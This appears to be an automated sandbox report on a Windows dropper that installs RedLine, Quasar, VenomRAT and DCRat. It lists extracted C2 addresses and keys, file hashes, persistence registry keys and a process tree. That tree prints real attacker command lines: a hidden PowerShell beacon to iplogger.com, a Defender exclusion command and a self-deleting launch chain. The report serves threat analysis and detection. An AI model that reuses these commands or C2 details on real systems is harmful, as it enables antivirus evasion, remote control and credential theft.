Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
28-10-2024 19:02
Static task
static1
Behavioral task
behavioral1
Sample
4363463463464363463463463.exe(3).exe
Resource
win7-20241023-en
General
-
Target
4363463463464363463463463.exe(3).exe
-
Size
10KB
-
MD5
2a94f3960c58c6e70826495f76d00b85
-
SHA1
e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
-
SHA256
2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
-
SHA512
fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
-
SSDEEP
192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K
Malware Config
Extracted
redline
Pizdun
94.142.138.219:20936
-
auth_value
20a1f7fe6575c6613ee7cc5d3025af70
Extracted
quasar
1.4.1
Office04
Extazz24535-22930.portmap.host:22930
89f58ee5-7af9-42de-843f-2a331a641e3f
-
encryption_key
CD4F349DEB46AEE10C2FE886E5B2BD7A766723CE
-
install_name
2klz.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Quasar Client Startup
-
subdirectory
SubDir
Extracted
asyncrat
Venom RAT + HVNC + Stealer + Grabber v6.0.3
Default
62.113.117.95:4449
hwelcvbupaqfzors
-
delay
10
-
install
false
-
install_folder
%AppData%
Signatures
-
Asyncrat family
-
Quasar family
-
Quasar payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\Files\2klz.exe family_quasar behavioral2/memory/2696-373-0x0000000000030000-0x0000000000354000-memory.dmp family_quasar -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/3860-142-0x0000000000420000-0x0000000000452000-memory.dmp family_redline -
Redline family
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\Files\XClient_protected.exe VenomRAT behavioral2/memory/2788-393-0x0000000000170000-0x0000000000192000-memory.dmp VenomRAT -
Venomrat family
-
Async RAT payload 1 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\Files\XClient_protected.exe family_asyncrat -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 44 2652 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepid process 2172 powershell.exe 436 powershell.exe 2652 powershell.exe 2172 powershell.exe 436 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
4363463463464363463463463.exe(3).exeDCRatBuild127.exeWScript.exejsawdtyjde.execlamer.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation 4363463463464363463463463.exe(3).exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation DCRatBuild127.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation jsawdtyjde.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation clamer.exe -
Executes dropped EXE 19 IoCs
Processes:
DCRatBuild127.exe1.exe2.exeDCRatBuild127.exenewfile.exe360_.exe360_.exeef12ce34.exeef12ce34.exeipscan221.exejsawdtyjde.execlamer.exegsprout.exethkdh.exewxha.exe2klz.exeClient.exeXClient_protected.exe2klz.exepid process 4000 DCRatBuild127.exe 4660 1.exe 3028 2.exe 1908 DCRatBuild127.exe 2020 newfile.exe 432 360_.exe 1224 360_.exe 4588 ef12ce34.exe 4052 ef12ce34.exe 4520 ipscan221.exe 2572 jsawdtyjde.exe 3452 clamer.exe 4276 gsprout.exe 948 thkdh.exe 2420 wxha.exe 2696 2klz.exe 3416 Client.exe 2788 XClient_protected.exe 2212 2klz.exe -
Loads dropped DLL 1 IoCs
Processes:
DCRatBuild127.exepid process 4000 DCRatBuild127.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 3 IoCs
Processes:
newfile.exe360_.exeef12ce34.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Windows Telemetry Crash Uploader = "C:\\ProgramData\\Telemetry.exe" newfile.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\c321cbe9 = "C:\\ProgramData\\ef12ce34.exe" 360_.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\c321cbe9 = "C:\\ProgramData\\ef12ce34.exe" ef12ce34.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs
Processes:
flow ioc 56 pastebin.com 58 pastebin.com 140 raw.githubusercontent.com 141 raw.githubusercontent.com 14 bitbucket.org 21 bitbucket.org 43 iplogger.com 44 iplogger.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 37 ip-api.com -
Suspicious use of SetThreadContext 3 IoCs
Processes:
1.exe360_.exeef12ce34.exedescription pid process target process PID 4660 set thread context of 3860 4660 1.exe AppLaunch.exe PID 432 set thread context of 1224 432 360_.exe 360_.exe PID 4588 set thread context of 4052 4588 ef12ce34.exe ef12ce34.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\Files\ipscan221.exe upx behavioral2/memory/4520-305-0x0000000000400000-0x000000000044B000-memory.dmp upx behavioral2/memory/4520-309-0x0000000000400000-0x000000000044B000-memory.dmp upx -
Drops file in Windows directory 1 IoCs
Processes:
thkdh.exedescription ioc process File created C:\Windows\Tasks\Test Task17.job thkdh.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 3596 4660 WerFault.exe 1.exe -
System Location Discovery: System Language Discovery 1 TTPs 23 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
4363463463464363463463463.exe(3).exepowershell.exe360_.exepowershell.exegsprout.exeDCRatBuild127.execmd.exeDCRatBuild127.exeAppLaunch.exe360_.exethkdh.exeClient.exe1.execmd.exepowershell.exePING.EXEef12ce34.exeef12ce34.exe2.exeWScript.execmd.exeipscan221.exewxha.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4363463463464363463463463.exe(3).exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 360_.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gsprout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DCRatBuild127.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DCRatBuild127.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AppLaunch.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 360_.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language thkdh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Client.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ef12ce34.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ef12ce34.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ipscan221.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wxha.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
Processes:
PING.EXEcmd.exepid process 4004 PING.EXE 3108 cmd.exe -
NSIS installer 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\Files\DCRatBuild127.exe nsis_installer_1 C:\Users\Admin\AppData\Local\Temp\Files\DCRatBuild127.exe nsis_installer_2 -
Modifies registry class 1 IoCs
Processes:
DCRatBuild127.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings DCRatBuild127.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 27 IoCs
Processes:
2.exepowershell.exe360_.exepowershell.exeef12ce34.exepowershell.exepid process 3028 2.exe 3028 2.exe 2652 powershell.exe 2652 powershell.exe 2652 powershell.exe 3028 2.exe 3028 2.exe 3028 2.exe 3028 2.exe 3028 2.exe 3028 2.exe 3028 2.exe 3028 2.exe 3028 2.exe 3028 2.exe 3028 2.exe 3028 2.exe 1224 360_.exe 1224 360_.exe 2172 powershell.exe 2172 powershell.exe 2172 powershell.exe 4052 ef12ce34.exe 4052 ef12ce34.exe 436 powershell.exe 436 powershell.exe 436 powershell.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
Processes:
4363463463464363463463463.exe(3).exepowershell.exenewfile.exepowershell.exepowershell.exe2klz.exeXClient_protected.exe2klz.exedescription pid process Token: SeDebugPrivilege 3136 4363463463464363463463463.exe(3).exe Token: SeDebugPrivilege 2652 powershell.exe Token: SeDebugPrivilege 2020 newfile.exe Token: SeDebugPrivilege 2172 powershell.exe Token: SeDebugPrivilege 436 powershell.exe Token: SeDebugPrivilege 2696 2klz.exe Token: SeDebugPrivilege 2788 XClient_protected.exe Token: SeDebugPrivilege 2212 2klz.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
2klz.exepid process 2212 2klz.exe -
Suspicious use of SendNotifyMessage 1 IoCs
Processes:
2klz.exepid process 2212 2klz.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
ipscan221.exe2klz.exepid process 4520 ipscan221.exe 4520 ipscan221.exe 2212 2klz.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
4363463463464363463463463.exe(3).exeDCRatBuild127.execmd.exeDCRatBuild127.exe1.exeWScript.exe360_.exe360_.execmd.exeef12ce34.exedescription pid process target process PID 3136 wrote to memory of 4000 3136 4363463463464363463463463.exe(3).exe DCRatBuild127.exe PID 3136 wrote to memory of 4000 3136 4363463463464363463463463.exe(3).exe DCRatBuild127.exe PID 3136 wrote to memory of 4000 3136 4363463463464363463463463.exe(3).exe DCRatBuild127.exe PID 4000 wrote to memory of 2512 4000 DCRatBuild127.exe cmd.exe PID 4000 wrote to memory of 2512 4000 DCRatBuild127.exe cmd.exe PID 4000 wrote to memory of 2512 4000 DCRatBuild127.exe cmd.exe PID 2512 wrote to memory of 4660 2512 cmd.exe 1.exe PID 2512 wrote to memory of 4660 2512 cmd.exe 1.exe PID 2512 wrote to memory of 4660 2512 cmd.exe 1.exe PID 2512 wrote to memory of 3028 2512 cmd.exe 2.exe PID 2512 wrote to memory of 3028 2512 cmd.exe 2.exe PID 2512 wrote to memory of 3028 2512 cmd.exe 2.exe PID 2512 wrote to memory of 1908 2512 cmd.exe DCRatBuild127.exe PID 2512 wrote to memory of 1908 2512 cmd.exe DCRatBuild127.exe PID 2512 wrote to memory of 1908 2512 cmd.exe DCRatBuild127.exe PID 2512 wrote to memory of 2652 2512 cmd.exe powershell.exe PID 2512 wrote to memory of 2652 2512 cmd.exe powershell.exe PID 2512 wrote to memory of 2652 2512 cmd.exe powershell.exe PID 1908 wrote to memory of 5020 1908 DCRatBuild127.exe WScript.exe PID 1908 wrote to memory of 5020 1908 DCRatBuild127.exe WScript.exe PID 1908 wrote to memory of 5020 1908 DCRatBuild127.exe WScript.exe PID 3136 wrote to memory of 2020 3136 4363463463464363463463463.exe(3).exe newfile.exe PID 3136 wrote to memory of 2020 3136 4363463463464363463463463.exe(3).exe newfile.exe PID 4660 wrote to memory of 3860 4660 1.exe AppLaunch.exe PID 4660 wrote to memory of 3860 4660 1.exe AppLaunch.exe PID 4660 wrote to memory of 3860 4660 1.exe AppLaunch.exe PID 4660 wrote to memory of 3860 4660 1.exe AppLaunch.exe PID 4660 wrote to memory of 3860 4660 1.exe AppLaunch.exe PID 5020 wrote to memory of 1592 5020 WScript.exe cmd.exe PID 5020 wrote to memory of 1592 5020 WScript.exe cmd.exe PID 5020 wrote to memory of 1592 5020 WScript.exe cmd.exe PID 3136 wrote to memory of 432 3136 4363463463464363463463463.exe(3).exe 360_.exe PID 3136 wrote to memory of 432 3136 4363463463464363463463463.exe(3).exe 360_.exe PID 3136 wrote to memory of 432 3136 4363463463464363463463463.exe(3).exe 360_.exe PID 432 wrote to memory of 1224 432 360_.exe 360_.exe PID 432 wrote to memory of 1224 432 360_.exe 360_.exe PID 432 wrote to memory of 1224 432 360_.exe 360_.exe PID 432 wrote to memory of 1224 432 360_.exe 360_.exe PID 432 wrote to memory of 1224 432 360_.exe 360_.exe PID 432 wrote to memory of 1224 432 360_.exe 360_.exe PID 432 wrote to memory of 1224 432 360_.exe 360_.exe PID 432 wrote to memory of 1224 432 360_.exe 360_.exe PID 432 wrote to memory of 1224 432 360_.exe 360_.exe PID 432 wrote to memory of 1224 432 360_.exe 360_.exe PID 1224 wrote to memory of 2172 1224 360_.exe powershell.exe PID 1224 wrote to memory of 2172 1224 360_.exe powershell.exe PID 1224 wrote to memory of 2172 1224 360_.exe powershell.exe PID 1224 wrote to memory of 3108 1224 360_.exe cmd.exe PID 1224 wrote to memory of 3108 1224 360_.exe cmd.exe PID 1224 wrote to memory of 3108 1224 360_.exe cmd.exe PID 3108 wrote to memory of 4004 3108 cmd.exe PING.EXE PID 3108 wrote to memory of 4004 3108 cmd.exe PING.EXE PID 3108 wrote to memory of 4004 3108 cmd.exe PING.EXE PID 3108 wrote to memory of 4588 3108 cmd.exe ef12ce34.exe PID 3108 wrote to memory of 4588 3108 cmd.exe ef12ce34.exe PID 3108 wrote to memory of 4588 3108 cmd.exe ef12ce34.exe PID 4588 wrote to memory of 4052 4588 ef12ce34.exe ef12ce34.exe PID 4588 wrote to memory of 4052 4588 ef12ce34.exe ef12ce34.exe PID 4588 wrote to memory of 4052 4588 ef12ce34.exe ef12ce34.exe PID 4588 wrote to memory of 4052 4588 ef12ce34.exe ef12ce34.exe PID 4588 wrote to memory of 4052 4588 ef12ce34.exe ef12ce34.exe PID 4588 wrote to memory of 4052 4588 ef12ce34.exe ef12ce34.exe PID 4588 wrote to memory of 4052 4588 ef12ce34.exe ef12ce34.exe PID 4588 wrote to memory of 4052 4588 ef12ce34.exe ef12ce34.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe(3).exe"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe(3).exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3136 -
C:\Users\Admin\AppData\Local\Temp\Files\DCRatBuild127.exe"C:\Users\Admin\AppData\Local\Temp\Files\DCRatBuild127.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4000 -
C:\Windows\SysWOW64\cmd.exe"cmd" /c start "" "1.exe" & start "" "2.exe" & start "" "DCRatBuild127.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1w25559q45"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2512 -
C:\Users\Admin\AppData\Local\Temp\1.exe"1.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4660 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"5⤵
- System Location Discovery: System Language Discovery
PID:3860 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4660 -s 1525⤵
- Program crash
PID:3596 -
C:\Users\Admin\AppData\Local\Temp\2.exe"2.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3028 -
C:\Users\Admin\AppData\Local\Temp\DCRatBuild127.exe"DCRatBuild127.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1908 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\wincrtDll\Kiq5HCXulld4.vbe"5⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5020 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\wincrtDll\3K4aPY2c2MDUmgYCS2.bat" "6⤵
- System Location Discovery: System Language Discovery
PID:1592 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "Invoke-WebRequest -Uri https://iplogger.com/1w25559q45"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2652 -
C:\Users\Admin\AppData\Local\Temp\Files\newfile.exe"C:\Users\Admin\AppData\Local\Temp\Files\newfile.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:2020 -
C:\Users\Admin\AppData\Local\Temp\Files\360_.exe"C:\Users\Admin\AppData\Local\Temp\Files\360_.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:432 -
C:\Users\Admin\AppData\Local\Temp\Files\360_.exe"C:\Users\Admin\AppData\Local\Temp\Files\360_.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1224 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -W Hidden -Exec Bypass Add-MpPreference -ExclusionPath "C:\ProgramData"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2172 -
C:\Windows\SysWOW64\cmd.execmd.exe /c (ping -n 10 127.0.0.1) & (del /F /Q "C:\Users\Admin\AppData\Local\Temp\Files\360_.exe") & (start "" "C:\ProgramData\ef12ce34.exe")4⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:3108 -
C:\Windows\SysWOW64\PING.EXEping -n 10 127.0.0.15⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4004 -
C:\ProgramData\ef12ce34.exe"C:\ProgramData\ef12ce34.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4588 -
C:\ProgramData\ef12ce34.exe"C:\ProgramData\ef12ce34.exe"6⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4052 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -W Hidden -Exec Bypass Add-MpPreference -ExclusionPath "C:\ProgramData"7⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:436 -
C:\Users\Admin\AppData\Local\Temp\Files\ipscan221.exe"C:\Users\Admin\AppData\Local\Temp\Files\ipscan221.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:4520 -
C:\Users\Admin\AppData\Local\Temp\Files\jsawdtyjde.exe"C:\Users\Admin\AppData\Local\Temp\Files\jsawdtyjde.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
PID:2572 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.bat" "3⤵PID:1312
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\clamer.execlamer.exe -priverdD4⤵
- Checks computer location settings
- Executes dropped EXE
PID:3452 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\thkdh.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\thkdh.exe"5⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:948 -
C:\Users\Admin\AppData\Local\Temp\Files\gsprout.exe"C:\Users\Admin\AppData\Local\Temp\Files\gsprout.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4276 -
C:\Users\Admin\AppData\Local\Temp\Files\2klz.exe"C:\Users\Admin\AppData\Local\Temp\Files\2klz.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2696 -
C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:2212 -
C:\Users\Admin\AppData\Local\Temp\Files\Client.exe"C:\Users\Admin\AppData\Local\Temp\Files\Client.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3416 -
C:\Users\Admin\AppData\Local\Temp\Files\XClient_protected.exe"C:\Users\Admin\AppData\Local\Temp\Files\XClient_protected.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2788
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4660 -ip 46601⤵PID:3476
-
C:\ProgramData\qhaflu\wxha.exeC:\ProgramData\qhaflu\wxha.exe1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2420
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
3Credentials In Files
2Credentials in Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5baf55b95da4a601229647f25dad12878
SHA1abc16954ebfd213733c4493fc1910164d825cac8
SHA256ee954c5d8156fd8890e582c716e5758ed9b33721258f10e758bdc31ccbcb1924
SHA51224f502fedb1a305d0d7b08857ffc1db9b2359ff34e06d5748ecc84e35c985f29a20d9f0a533bea32d234ab37097ec0481620c63b14ac89b280e75e14d19fd545
-
Filesize
1KB
MD54280e36a29fa31c01e4d8b2ba726a0d8
SHA1c485c2c9ce0a99747b18d899b71dfa9a64dabe32
SHA256e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359
SHA512494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4
-
Filesize
18KB
MD5ecaeae6e34ade14e56fdfffd5daf8bb7
SHA16086dfcabef4901482894baf06e6f11b5586abdc
SHA256e110b441429821f04e146df36629730c7abf2f970d9f62022610af8b32e541c3
SHA5126daf86020893e7a328ea9ddfc7a1f4ec26cdb8e427c835b2563e4422a5f753143e50638a7f6703472d9ae18606eb5b2e43a7e26ec52b9322935ace557cebc7e4
-
Filesize
18KB
MD5ee392093f22078e83341de3ff684ed41
SHA169b9df1a5493684ac4207e61cd436440a4db10bc
SHA2564840ff78dea7308d934e1191e962590f1caa0d666a611430d2d24a36aef55488
SHA5126d0f0376d7b6870f6c391c415ed0f6f409285bf68b5090edb0cf1f4f0a51e75859be22c4d5dc73a6f82a0ed55393f69833d6cc947f9017aef57d22f34f3de06b
-
Filesize
284KB
MD595d5aa97a3c15cee24aad800cc169d2b
SHA12ace4e384316f6aba1a77fbea5a30d73259760d6
SHA2561a56132c232842530d78edb6d0ce387b98995e2912df0075d74db9b2f9aa3770
SHA5125e024d56d44f1de22e201bc91d4a125bc1d3a6f0ef005d6213a5256decd1ff52a8abb77f2fbaa8304dcdeb21e4f4ed4bd0008858e6a2ab5a04943985ab02ddbe
-
Filesize
1.1MB
MD51a2b16c17517d602806431c0744f5f8f
SHA1465e2d6bd37972295cd017f78f35faa07102ab4e
SHA256d52c40b759d5c215ab4090e972038dd6bdcad31c56d72d9a25ed6e76f3f952f1
SHA512a5bf48dcdc3bde33d919f5e65c183d5fb12cb671497d990dcce38f353bf6546aa0dd4d258e6c7e5b735a47c532a405eeecb78d146afce4382c5e72b2ccffc4bd
-
Filesize
309KB
MD5757123039fc621efee71d41b044d14c5
SHA1d3b5b88f7d5aeddf4994a90b5d888677c31d72b9
SHA256afcaa62dd1e4dddd03a67db6175f406742c7c759b2f919e20a142d8b89554064
SHA5125d910968da586bce3b3ba35727492abcc928abe016265aa17b366b1e4f4c5c1f814f44612595abdfdae2e9a87524e4085aa0151adcdee72f95fc41642beaf4b1
-
Filesize
3.1MB
MD501cb0e497f40e7d02f93255475f175e1
SHA198c779497d6514b91cd1410f627a5320f6b3eab5
SHA25615893230cadb8c8fba530903bc2a7e5cb4da78c00d40ea9473963455978c0f95
SHA512fc81504089f520935d95e98ea867faf3dcc44b2399c418fea95f193c45584d72730868ce4362beef4adc5f9a89c008da1fc7a529a35a6cc7803d0ca15f386ef9
-
Filesize
200KB
MD55d026af9171c4bcec7b38ff42b1fb266
SHA1e97563e92862f5284352147ba3de4fca45e11f81
SHA256052cee21bf536d51bcaf66edc262a1c391dea5a941cda58b83bf1eea43037169
SHA512c5fbb96bfb4e9de7ac71ce9595678e9e724a9728bb26085f2e411d29638ffb2e74e3106375a5251b96d01f2007752559a042b22ce4594bda8a0982c588c288ce
-
Filesize
31KB
MD563f444ed65088c9e278ec2e6892899a6
SHA1588c5ca8e39578b9341f7cbaa7bec05af51566c4
SHA2566cb9455b415038c5fe7e6d86677f3751033b0478f7264a171cc7a277ad3b706c
SHA5121859caf0ba1c328142c8910f4504aea0096d55dac286809ae161c827558f60875f76d5840e469644092ecd05891de5da7ef0f492f50f47d8279dd86704a69567
-
Filesize
1.5MB
MD52d1c174ac5d4a6df46585926e49bbd73
SHA19fa4fb19a3859a391618ff909c1f0362af579d5d
SHA2563e4df98402da35b9ea2ef9b488b63c8b7bc536b75dd164fd88b50163751bc47c
SHA512484b7e78a843dd66d7945fab7b14e4163f6af06c766508dc744b77984a4cdb14a1290d953915d4d8f3a32acf108583e2991dd90aa503c8fa6dc72115dbed056a
-
Filesize
111KB
MD5c27417453090d3cf9a3884b503d22c49
SHA117938ece6999bc94d651743063c3f989e38547b4
SHA256d330b3cec745ce7bf9856e3cdce277a52fe7ad09874d519fa7b9b080a61a7407
SHA51227d115974702510f9ef7eb841d359764197429ed9d233f98facec317fdaa8b4ec4e481103d8b950ee2f10711280e7296457107d928603af2174b586233abb443
-
Filesize
278KB
MD592ae7a1286d992e104c0072f639941f7
SHA1d2c0fe4e7e9df1b4a9a4cd69e3167003e51c73b2
SHA2561771c4e6e34fda6a68c7b1d980cc3dffbe587c651f985bf7235c6af9a8904fd3
SHA512bed93d1e09f576c52b231046cbf9a4ef81ebb2f68eaa6fc7b0eea889418e5f3af440fef5da55882b5535f26d994fdd34c288ba62e7fb033f5bd372cf752bb62b
-
Filesize
108KB
MD56c1bcf0b1297689c8c4c12cc70996a75
SHA19d99a2446aa54f00af0b049f54afa52617a6a473
SHA25640dc213fe4551740e12cac575a9880753a9dacd510533f31bd7f635e743a7605
SHA5127edf53adf8db463658aa4a966cf9e22bf28583cb0ca4317af19e90d85232b6cb627e810033155383948d36ad6a1a14f32b3381d10c7cd6c4bd0482c974c129db
-
Filesize
898KB
